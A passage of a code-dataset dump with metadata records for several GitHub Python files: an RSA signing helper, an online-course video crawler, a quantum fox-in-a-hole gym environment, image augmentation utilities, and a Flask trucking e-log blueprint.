"matplotlib.pyplot", "line_number": 619, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 620, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 620, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 620, "usage_type": "call"}, {"api_name": "os.path", "line_number": 620, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.close", "line_number": 621, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 621, "usage_type": "name"}, {"api_name": "numpy.concatenate", "line_number": 655, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 657, "usage_type": "call"}, {"api_name": "tensorflow.keras.utils.to_categorical", "line_number": 660, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 664, "usage_type": "call"}, {"api_name": "numpy.hstack", "line_number": 738, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 822, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 822, "usage_type": "call"}, {"api_name": "os.path", "line_number": 822, "usage_type": "attribute"}, {"api_name": "tqdm.tqdm", "line_number": 826, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 894, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 894, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 896, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 896, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 901, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 901, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.bar", "line_number": 902, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 902, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 908, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 908, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 911, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 911, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 912, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 912, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 913, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 913, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 914, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 914, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.yticks", "line_number": 915, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 915, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 916, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 916, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 917, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 917, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.gca", "line_number": 918, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 918, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 919, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 919, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 919, "usage_type": "call"}, {"api_name": "os.path", "line_number": 919, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.close", "line_number": 920, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 920, "usage_type": "name"}, {"api_name": "pandas.DataFrame.from_dict", "line_number": 925, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 925, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 928, "usage_type": "call"}, {"api_name": "os.path", "line_number": 928, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame.from_dict", "line_number": 931, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 931, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 934, "usage_type": "call"}, {"api_name": "os.path", "line_number": 934, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame.from_dict", "line_number": 937, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 937, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 940, "usage_type": "call"}, {"api_name": "os.path", "line_number": 940, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame.from_dict", "line_number": 943, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 943, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 946, "usage_type": "call"}, {"api_name": "os.path", "line_number": 946, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame.from_dict", "line_number": 949, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 949, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 952, "usage_type": "call"}, {"api_name": "os.path", "line_number": 952, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame.from_dict", "line_number": 955, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 955, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 958, "usage_type": "call"}, {"api_name": "os.path", "line_number": 958, "usage_type": "attribute"}]} +{"seq_id": "4459679659", "text": "# -*- coding:utf-8 -*-\nimport base64\nimport os\n\n\n__author__ = [\n '\"liubo\" <liubo@51domi.com>'\n]\n\n\nclass RSASigner():\n def __init__(self, app_id):\n from Crypto.PublicKey import RSA\n from luhu_biz.orm.coop_app import CoopApp\n\n if app_id == \"luhu\":\n public_key = open('%s/keys/luhu_rsa_public_key.pem' % os.path.split(os.path.realpath(__file__))[0],\n 'r').read()\n else:\n public_key = CoopApp.get(app_id).public_key\n self.public_key = RSA.importKey(public_key)\n self.private_key = RSA.importKey(\n open('%s/keys/luhu_rsa_private_key.pem' % os.path.split(os.path.realpath(__file__))[0],\n 'r').read())\n\n def sign(self, message):\n '''\n @param message: 需要签名的字符串\n '''\n from Crypto.Hash import SHA\n from Crypto.Signature import PKCS1_v1_5 as pk\n from Crypto.Random import atfork\n\n atfork()\n digest = SHA.new(message)\n signer = pk.new(self.private_key)\n signed_message = signer.sign(digest)\n signed_message = base64.b64encode(signed_message)\n return signed_message\n\n def verify(self, message, sign):\n from Crypto.Hash import SHA\n from Crypto.Signature import PKCS1_v1_5 as pk\n\n sign = base64.b64decode(sign)\n verifier = pk.new(self.public_key)\n if verifier.verify(SHA.new(message), sign):\n return True\n else:\n return False\n\n", "repo_name": "sluggard6/bgirl", "sub_path": "bg_biz/pay/sign/rsa.py", "file_name": "rsa.py", "file_ext": "py", "file_size_in_byte": 1508, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "os.path.split", "line_number": 17, "usage_type": "call"}, {"api_name": "os.path", "line_number": 17, "usage_type": "attribute"}, {"api_name": "os.path.realpath", "line_number": 17, "usage_type": "call"}, {"api_name": "luhu_biz.orm.coop_app.CoopApp.get", "line_number": 20, "usage_type": "call"}, {"api_name": "luhu_biz.orm.coop_app.CoopApp", "line_number": 20, "usage_type": "name"}, {"api_name": "Crypto.PublicKey.RSA.importKey", "line_number": 21, "usage_type": "call"}, {"api_name": "Crypto.PublicKey.RSA", "line_number": 21, "usage_type": "name"}, {"api_name": "Crypto.PublicKey.RSA.importKey", "line_number": 22, "usage_type": "call"}, {"api_name": "Crypto.PublicKey.RSA", "line_number": 22, "usage_type": "name"}, {"api_name": "os.path.split", "line_number": 23, "usage_type": "call"}, {"api_name": "os.path", "line_number": 23, "usage_type": "attribute"}, {"api_name": "os.path.realpath", "line_number": 23, "usage_type": "call"}, {"api_name": "Crypto.Random.atfork", "line_number": 34, "usage_type": "call"}, {"api_name": "Crypto.Hash.SHA.new", "line_number": 35, "usage_type": "call"}, {"api_name": "Crypto.Hash.SHA", "line_number": 35, "usage_type": "name"}, {"api_name": "Crypto.Signature.PKCS1_v1_5.new", "line_number": 36, "usage_type": "call"}, {"api_name": "Crypto.Signature.PKCS1_v1_5", "line_number": 36, "usage_type": "name"}, {"api_name": "base64.b64encode", "line_number": 38, "usage_type": "call"}, {"api_name": "base64.b64decode", "line_number": 45, "usage_type": "call"}, {"api_name": "Crypto.Signature.PKCS1_v1_5.new", "line_number": 46, "usage_type": "call"}, {"api_name": "Crypto.Signature.PKCS1_v1_5", "line_number": 46, "usage_type": "name"}, {"api_name": "Crypto.Hash.SHA.new", "line_number": 47, "usage_type": "call"}, {"api_name": "Crypto.Hash.SHA", "line_number": 47, "usage_type": "name"}]} +{"seq_id": "42784308810", "text": "import re\r\nimport os\r\nimport thre\r\nimport requests\r\nfrom pyquery import PyQuery as q\r\n\r\n\r\ndef fit3_1(url):\r\n s = q(url, headers=headers)\r\n r = s('div').filter('.moco-course-wrap')\r\n for i in r:\r\n link = re.findall(r'learn/\\d{1,6}(?=\")', str(q(i)))\r\n if link:\r\n ur = 'http://www.imooc.com/' + link[-1]\r\n print(ur)\r\n fit2(ur)\r\n\r\ndef fit4(url):\r\n s = q(url, headers=headers)\r\n r = s('div').filter('.item')\r\n link = re.findall(r'c=.+?(?=\")', str(r))\r\n for li in link:\r\n url = 'http://www.imooc.com/course/list?' + li\r\n print(url)\r\n fit3(url)\r\n\r\n\r\ndef fit3(url):\r\n s = q(url, headers=headers)\r\n r = s('div').filter('.page')\r\n if r:\r\n pages = re.findall(r'\\d', str(r.text()))\r\n for page in pages:\r\n urls = url + '&page=' + page\r\n fit3_1(urls)\r\n else:\r\n fit3_1(url)\r\n\r\n\r\n\r\ndef fit2(url):\r\n s = q(url, headers=headers)\r\n r = s('div').filter('.chapter ')\r\n name1 = s('h2').text()\r\n for i in r:\r\n a = q(i)\r\n name2 = re.findall(r'第\\d.+?(?=&)',str(a))\r\n link = a('a').filter('.J-media-item')\r\n for i in link:\r\n link = re.findall(r'(?<=video/).+?(?=\")', str(q(i)))\r\n b = q(i).text()\r\n name3 = re.findall(r'\\d-\\d.+(?=\\r)', str(b))\r\n if link:\r\n url = 'http://www.imooc.com/course/ajaxmediainfo/?mid=' + link[-1] + '&mode=flash'\r\n r = requests.get(url)\r\n r = r.json()\r\n r = r['data']['result']['mpath']\r\n H = r[-1]#BD\r\n M = r[-2]#HD\r\n L = r[-3]#SD\r\n mkdr = '.\\\\' + name1 + '\\\\' + name2[-1]\r\n if os.path.exists(mkdr)==False: \r\n os.makedirs(mkdr)\r\n name = name1 + '\\\\' + name2[-1] + '\\\\' + name3[-1] + '.mp4'\r\n thre.download( H, name, blocks=3, proxies={} )\r\n \r\n\r\ndef fit1(url):\r\n link = url.split('/', -1)[-1]\r\n ul = 'http://www.imooc.com/course/ajaxmediainfo/?mid=' + link + '&mode=flash'\r\n s = q(url, headers=headers)\r\n r = s('em').text()\r\n video = re.findall(r'\\d-.+?(?=\\d)', r)\r\n name = video[-1] + '.mp4'\r\n r = requests.get(ul)\r\n r = r.json()\r\n r = r['data']['result']['mpath']\r\n H = r[-1]#BD\r\n M = r[-2]#HD\r\n L = r[-3]#SD\r\n thre.download( H, name, blocks=4, proxies={} )\r\n\r\n\r\ndef ur(url):\r\n if url =='http://www.imooc.com/':\r\n print('fit4')\r\n fit4(url)\r\n elif url.split('/',-1)[-2] == 'video':\r\n print('fit1')\r\n fit1(url)\r\n elif url.split('/',-1)[-2] == 'learn':\r\n print('fit2')\r\n fit2(url)\r\n else:\r\n print('fit3')\r\n fit3(url)\r\n\r\nheaders = {'User-Agent':'Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0'}\r\nprint('请输入链接地址:',end=\"\")\r\nurl = input()\r\nur(url)\r\n\r\n", "repo_name": "somnusx/crawl-muke", "sub_path": "crawl muke.py", "file_name": "crawl muke.py", "file_ext": "py", "file_size_in_byte": 2928, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pyquery.PyQuery", "line_number": 9, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 12, "usage_type": "call"}, {"api_name": "pyquery.PyQuery", "line_number": 12, "usage_type": "call"}, {"api_name": "pyquery.PyQuery", "line_number": 19, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 21, "usage_type": "call"}, {"api_name": "pyquery.PyQuery", "line_number": 29, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 32, "usage_type": "call"}, {"api_name": "pyquery.PyQuery", "line_number": 42, "usage_type": "call"}, {"api_name": "pyquery.PyQuery", "line_number": 46, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 47, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 50, "usage_type": "call"}, {"api_name": "pyquery.PyQuery", "line_number": 50, "usage_type": "call"}, {"api_name": "pyquery.PyQuery", "line_number": 51, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 52, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 55, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 62, "usage_type": "call"}, {"api_name": "os.path", "line_number": 62, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 63, "usage_type": "call"}, {"api_name": "thre.download", "line_number": 65, "usage_type": "call"}, {"api_name": "pyquery.PyQuery", "line_number": 71, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 73, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 75, "usage_type": "call"}, {"api_name": "thre.download", "line_number": 81, "usage_type": "call"}]} +{"seq_id": "13898082749", "text": "import numpy as np\n\n# OpenAI gym\nimport gym\nfrom gym import spaces\n\n# Import fox-in-a-hole game\nfrom unitary.examples.fox_in_a_hole.fox_in_a_hole import *\n\nclass FoxHole(gym.Env):\n def __init__(self, num_holes, max_steps):\n super(FoxHole, self).__init__()\n\n # Define action and observation space\n # They must be gym.spaces objects\n self.num_holes = num_holes\n self.max_steps = max_steps\n\n # Possible actions\n self.action_space = spaces.Discrete(num_holes)\n self.observation_space = spaces.Box(low=np.zeros(max_steps), high=np.ones(max_steps), dtype=np.uint8)\n self.reset()\n\n def step(self, action):\n self.history[self.s] = action\n self.s += 1\n\n # Perform action\n done = self.game.check_guess(action)\n # Fox makes a move\n move_str = self.game.take_random_move()\n # Update observation\n observation = np.array(self.history) #self.game.get_probabilities()\n\n # Perhaps we won?\n reward = 1 if done else 0\n\n if self.s >= self.max_steps:\n done = True\n reward = 0\n\n info = {'move':'quantum' if move_str[0]==\"S\" else 'classical'}\n return observation, reward, done, info\n\n def reset(self):\n # Create a new game\n self.game = QuantumGame(iswap=True, hole_nr=self.num_holes)\n self.game.initialize_state()\n self.s = 0\n\n self.history = np.zeros(self.max_steps) #self.game.get_probabilities()\n return np.array(self.history)\n\n def render(self, mode='human'):\n print(\"Game History:\")\n for i in range(self.s):\n print(\"Move {0}: {1}\".format(i,self.history[i]))\n\n def close (self):\n return\n\nif __name__ == \"__main__\":\n # Test env\n env = FoxHole(5,10)\n\n env.reset()\n\n action = env.action_space.sample()\n obs, rewards, done, info = env.step(action)\n action = env.action_space.sample()\n obs, rewards, done, info = env.step(action)\n env.render()\n", "repo_name": "everthemore/FoxHole", "sub_path": "FoxHoleEnvironment.py", "file_name": "FoxHoleEnvironment.py", "file_ext": "py", "file_size_in_byte": 2009, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "gym.Env", "line_number": 10, "usage_type": "attribute"}, {"api_name": "gym.spaces.Discrete", "line_number": 20, "usage_type": "call"}, {"api_name": "gym.spaces", "line_number": 20, "usage_type": "name"}, {"api_name": "gym.spaces.Box", "line_number": 21, "usage_type": "call"}, {"api_name": "gym.spaces", "line_number": 21, "usage_type": "name"}, {"api_name": "numpy.zeros", "line_number": 21, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 21, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 21, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 33, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 51, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 52, "usage_type": "call"}]} +{"seq_id": "72042263844", "text": "import random\nimport PIL.Image as Image\nfrom PIL import ImageEnhance\n\ndef get_patch_low_light(low_light, ground_truth, patch_size):\n #수정해야함\n height, width = low_light.size[1], low_light.size[0]\n\n ix = random.randrange(0, width - patch_size + 1)\n iy = random.randrange(0, height - patch_size + 1)\n\n # 가로시작점, 세로시작점, 가로범위, 세로범위\n crop_area = (ix, iy, ix + patch_size, iy + patch_size)\n\n low_light_img = low_light.crop(crop_area)\n ground_truth_img = ground_truth.crop(crop_area)\n\n return low_light_img, ground_truth_img\n\ndef get_patch_low_light_global(low_light, ground_truth, patch_size):\n #수정해야함\n height, width = low_light.size[1], low_light.size[0]\n\n ix = random.randrange(0, width - patch_size + 1)\n iy = random.randrange(0, height - patch_size + 1)\n\n # 가로시작점, 세로시작점, 가로범위, 세로범위\n crop_area = (ix, iy, ix + patch_size, iy + patch_size)\n select_num = random.randint(1,2)\n if select_num == 1:\n low_light_img = low_light.crop(crop_area)\n ground_truth_img = ground_truth.crop(crop_area)\n else :\n illumination = random.randint(1,10) * 0.1\n low_light_img = ground_truth.crop(crop_area)\n global_illumination_Image = ImageEnhance.Brightness(low_light_img)\n low_light_img = global_illumination_Image.enhance(illumination)\n ground_truth_img = ground_truth.crop(crop_area)\n\n return low_light_img, ground_truth_img\n\n\ndef augmentation_low_light(low_light, ground_truth, args):\n rotate = args.augment_rotate == 0 and random.random() < 0.5\n augment_T2B = args.augment_T2B == 0 and random.random() < 0.5\n augment_L2R = args.augment_L2R == 0 and random.random() < 0.5\n\n if rotate :\n i = random.randint(0, 3) # 1부터 100 사이의 임의의 정수\n rotate_list = [90,180,-90,-180]\n low_light = low_light.rotate(rotate_list[i])\n ground_truth = ground_truth.rotate(rotate_list[i])\n\n\n if augment_T2B:\n low_light = low_light.transpose(Image.FLIP_TOP_BOTTOM)\n ground_truth = ground_truth.transpose(Image.FLIP_TOP_BOTTOM)\n\n if augment_L2R:\n low_light = low_light.transpose(Image.FLIP_LEFT_RIGHT)\n ground_truth = ground_truth.transpose(Image.FLIP_LEFT_RIGHT)\n\n return low_light, ground_truth\n\ndef get_patch_sr(low_light_image, low_light_ground_truth_image, hr_image, patch_size, scale):\n\n hr_height, hr_width = hr_image.size[1], hr_image.size[0]\n lr_height, lr_width = low_light_image.size[1], low_light_image.size[0]\n\n hr_patch_size = (int)(scale * patch_size) # 128\n lr_patch_size = patch_size\n\n lr_x = random.randrange(0, lr_width - lr_patch_size + 1)\n lr_y = random.randrange(0, lr_height - lr_patch_size + 1)\n\n hr_x = lr_x * scale\n hr_y = lr_y * scale\n\n target_hr_x = random.randrange(0, hr_width - hr_patch_size + 1)\n target_hr_y = random.randrange(0, hr_height - hr_patch_size + 1)\n\n lr_crop_area = (lr_x, lr_y, lr_x+lr_patch_size, lr_y+lr_patch_size)\n hr_crop_area = (hr_x, hr_y, hr_x+hr_patch_size, hr_y+hr_patch_size)\n target_hr_crop_area = (target_hr_x, target_hr_y, target_hr_x + hr_patch_size, target_hr_y + hr_patch_size)\n\n lr_patch = low_light_image.crop(lr_crop_area)\n lr_gt_patch = low_light_ground_truth_image.crop(lr_crop_area)\n hr_patch = hr_image.crop(hr_crop_area)\n # lr_patch = hr_patch.resize((patch_size, patch_size), Image.BICUBIC)\n hr_target_patch = hr_image.crop(target_hr_crop_area)\n\n return lr_patch, lr_gt_patch, hr_patch, hr_target_patch\n\ndef augmentation_sr(lr_patch, lr_gt_patch, hr_patch, hr_target_patch, args):\n rotate = args.augment_rotate == 0 and random.random() < 0.5\n augment_T2B = args.augment_T2B == 0 and random.random() < 0.5\n augment_L2R = args.augment_L2R == 0 and random.random() < 0.5\n\n if rotate :\n i = random.randint(0, 3) # 1부터 100 사이의 임의의 정수\n rotate_list = [90,180,-90,-180]\n lr_patch = lr_patch.rotate(rotate_list[i])\n lr_gt_patch = lr_gt_patch.rotate(rotate_list[i])\n hr_patch = hr_patch.rotate(rotate_list[i])\n hr_target_patch = hr_target_patch.rotate(rotate_list[i])\n\n\n if augment_T2B:\n lr_patch = lr_patch.transpose(Image.FLIP_TOP_BOTTOM)\n lr_gt_patch = lr_gt_patch.transpose(Image.FLIP_TOP_BOTTOM)\n hr_patch = hr_patch.transpose(Image.FLIP_TOP_BOTTOM)\n hr_target_patch = hr_target_patch.transpose(Image.FLIP_TOP_BOTTOM)\n\n if augment_L2R:\n lr_patch = lr_patch.transpose(Image.FLIP_LEFT_RIGHT)\n lr_gt_patch = lr_gt_patch.transpose(Image.FLIP_LEFT_RIGHT)\n hr_patch = hr_patch.transpose(Image.FLIP_LEFT_RIGHT)\n hr_target_patch = hr_target_patch.transpose(Image.FLIP_LEFT_RIGHT)\n\n return lr_patch, lr_gt_patch, hr_patch, hr_target_patch", "repo_name": "dokyeongK/DALE", "sub_path": "data/dataset_utils.py", "file_name": "dataset_utils.py", "file_ext": "py", "file_size_in_byte": 4840, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 26, "dataset": "github-code", "pt": "52", "api": [{"api_name": "random.randrange", "line_number": 9, "usage_type": "call"}, {"api_name": "random.randrange", "line_number": 10, "usage_type": "call"}, {"api_name": "random.randrange", "line_number": 24, "usage_type": "call"}, {"api_name": "random.randrange", "line_number": 25, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 29, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 34, "usage_type": "call"}, {"api_name": "PIL.ImageEnhance.Brightness", "line_number": 36, "usage_type": "call"}, {"api_name": "PIL.ImageEnhance", "line_number": 36, "usage_type": "name"}, {"api_name": "random.random", "line_number": 44, "usage_type": "call"}, {"api_name": "random.random", "line_number": 45, "usage_type": "call"}, {"api_name": "random.random", "line_number": 46, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 49, "usage_type": "call"}, {"api_name": "PIL.Image.FLIP_TOP_BOTTOM", "line_number": 56, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 56, "usage_type": "name"}, {"api_name": "PIL.Image.FLIP_TOP_BOTTOM", "line_number": 57, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 57, "usage_type": "name"}, {"api_name": "PIL.Image.FLIP_LEFT_RIGHT", "line_number": 60, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 60, "usage_type": "name"}, {"api_name": "PIL.Image.FLIP_LEFT_RIGHT", "line_number": 61, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 61, "usage_type": "name"}, {"api_name": "random.randrange", "line_number": 73, "usage_type": "call"}, {"api_name": "random.randrange", "line_number": 74, "usage_type": "call"}, {"api_name": "random.randrange", "line_number": 79, "usage_type": "call"}, {"api_name": "random.randrange", "line_number": 80, "usage_type": "call"}, {"api_name": "random.random", "line_number": 95, "usage_type": "call"}, {"api_name": "random.random", "line_number": 96, "usage_type": "call"}, {"api_name": "random.random", "line_number": 97, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 100, "usage_type": "call"}, {"api_name": "PIL.Image.FLIP_TOP_BOTTOM", "line_number": 109, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 109, "usage_type": "name"}, {"api_name": "PIL.Image.FLIP_TOP_BOTTOM", "line_number": 110, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 110, "usage_type": "name"}, {"api_name": "PIL.Image.FLIP_TOP_BOTTOM", "line_number": 111, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 111, "usage_type": "name"}, {"api_name": "PIL.Image.FLIP_TOP_BOTTOM", "line_number": 112, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 112, "usage_type": "name"}, {"api_name": "PIL.Image.FLIP_LEFT_RIGHT", "line_number": 115, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 115, "usage_type": "name"}, {"api_name": "PIL.Image.FLIP_LEFT_RIGHT", "line_number": 116, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 116, "usage_type": "name"}, {"api_name": "PIL.Image.FLIP_LEFT_RIGHT", "line_number": 117, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 117, "usage_type": "name"}, {"api_name": "PIL.Image.FLIP_LEFT_RIGHT", "line_number": 118, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 118, "usage_type": "name"}]} +{"seq_id": "32719329395", "text": "from flask import Blueprint, render_template, redirect, url_for, abort, request, jsonify\nfrom flask.ext.login import login_required, current_user\nfrom flask.ext.principal import Permission, UserNeed\nfrom webapp1.extensions import poster_permission, admin_permission\nfrom webapp1.forms import DriverForm, ElogForm, EmailServicesForm, BluetoothServicesForm, USBServicesForm, \\\n WIFIservicesForm, CertifyForm\nfrom webapp1.models import drivers, db, RPM, User, Events\nimport datetime\nfrom sqlalchemy import update\nimport random\n\nlogs_blueprint = Blueprint(\n 'logs',\n __name__,\n template_folder='../templates/logs',\n url_prefix=\"/logs\"\n)\n\n\n##OBD simulator\n#Simulates J1939 data feeding this truck:\n#Send request for RPM\n#Receives data triggers all the events...\n#Updates Events Table\n#newevents = Events()\n#db.session.add(Events)\n#try:\n# db.session.commit()\n#except Exception as e:\n# db.session.rollback\n\n\n\n@logs_blueprint.route('/certify', methods=['GET', 'POST'])\ndef certifylogs():\n certify = CertifyForm(request.form)\n return render_template('certifylogs.html', role = 1, certify = certify)\n\n\n@logs_blueprint.route('/certifylogsaccept', methods=['GET', 'POST'])\ndef certifylogscomplete():\n certify = CertifyForm(request.form)\n data =str(datetime.datetime.today().day) + \"\" + str(datetime.datetime.today().month) + \"\" + str(datetime.datetime.today().year)\n thisdate_ = int(data)\n previousmax = db.engine.execute('select max(\"Event_Code\") from events where events.todays_log = %s and user_id = %s',[int(data), current_user.get_id()])\n\n try:\n for i in previousmax:\n data = i\n data = data[0]\n if(int(data) > 8):\n eventrecord = 9\n else:\n eventrecord = data + 1\n except Exception as e:\n eventrecord = 1\n event = Events(Event_Record_Status = 1, Event_Record_Origin = 2, Event_Type = 4, Event_Code = int(eventrecord), Event_Date = datetime.datetime.now(), Event_Time = datetime.datetime.now(), user_id = current_user.get_id(), todays_log = thisdate_)\n db.session.add(event)\n db.session.commit() \n #form = DriverForm(request.form)\n return render_template('certifylogs.html', role = 1, certify = certify)\n\n\n@logs_blueprint.route('/gasoline', methods=['GET', 'POST'])\ndef gasoline():\n elog = ElogForm(request.form)\n form = DriverForm(request.form)\n try:\n firstname = request.form.get('firstname')\n lastname = request.form.get('lastname')\n driverslicense = request.form.get('driverslicense')\n driverslicensestate = request.form.get('driverslicensestate')\n driver = drivers(firstname, lastname, driverslicense, driverslicensestate)\n db.session.add(driver)\n except Exception as e:\n print(e)\n db.session.rollback()\n if not current_user.is_authenticated:\n return redirect(url_for('admin.login_view'))\n return render_template('gasoline.html', form=form, elog=elog, role = 2)\n\n\n@logs_blueprint.route('/roadside', methods=['GET', 'POST'])\ndef logs():\n # This is going to return a list of dictionaries that will generate the table in the logs.html template\n # It will start with some sort of query that will iterate over the results and encode them into the list of dictionaries.\n # For example\n counter = 0\n list_ = []\n for i in range(0, 96):\n list__ = []\n counter = counter + .25\n list__.append(counter)\n list__.append(random.randint(1, 4))\n list_.append(list__)\n\n date = request.form.get('datefrom')\n\n elog = ElogForm(request.form)\n form = DriverForm(request.form)\n try:\n date = request.form.get('datefrom')\n except Exception as e:\n date = \"2017-11-27\"\n # date = \"2017-03-03\"\n # Injecting to test this new filtering events method\n try:\n data = date.split('/')\n except Exception as e:\n date = str(datetime.datetime.today().month) + \"/\" + str(datetime.datetime.today().day) + \"/\" + str(\n datetime.datetime.today().year)\n data = date.split('/')\n date = str(datetime.datetime.today().month) + \"-\" + str(datetime.datetime.today().day) + \"-\" + str(\n datetime.datetime.today().year)\n\n dateforfiltering = str(date).split(\"-\")\n dateforfiltering = str(dateforfiltering[2]) + \"\" + str(dateforfiltering[1]) + \"\" + str(dateforfiltering[0])\n date_to_redirect_to_edit = str(dateforfiltering[2]) + \"-\" + str(dateforfiltering[1]) + \"-\" + str(\n dateforfiltering[0])\n thisdata_ = Events.query.filter_by(todays_log=int(dateforfiltering)).all()\n newlist_ = []\n for i in thisdata_:\n # (str(i).split(\",\")\n newlist_.append(str(i).split(\",\"))\n\n # Google Charts working code for logs\n stateinitial = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 1, 2, 3, 4, 5, 6, 7, 8, 8]\n reportinglist = []\n for i in range(0, len(newlist_)):\n # if(int(rows[1][0]) > 499):\n newdata = []\n try:\n newdata.append(int(i))\n newdata.append(int(newlist_[i][6]))\n\n reportinglist.append(newdata)\n except Exception as e:\n print(e)\n current_status = 'driving'\n if not current_user.is_authenticated:\n return redirect(url_for('admin.login_view'))\n\n return render_template('logs.html', form=form, elog=elog, role=1, current_status=current_status,\n events_log=newlist_, logdata=reportinglist, thiddate_=dateforfiltering,\n date_to_redirect_to_edit=date_to_redirect_to_edit)\n\n\n\n\n@logs_blueprint.route('/showlogs', methods=['GET', 'POST'])\ndef logs1():\n #This is going to return a list of dictionaries that will generate the table in the logs.html template\n #It will start with some sort of query that will iterate over the results and encode them into the list of dictionaries.\n # For example\n _driver_ = request.args.get(\"driverid\")\n counter = 0\n list_ = []\n for i in range(0,96):\n list__ = []\n counter = counter + .25\n list__.append(counter)\n list__.append(random.randint(1,4))\n list_.append(list__)\n \n date = request.form.get('datefrom')\n elog = ElogForm(request.form)\n form = DriverForm(request.form)\n try:\n date = request.form.get('datefrom')\n date = 2932018\n except Exception as e:\n date = \"2017-11-27\"\n # date = \"2017-03-03\"\n #Injecting to test this new filtering events method\n try:\n data = date.split('/')\n except Exception as e:\n date = 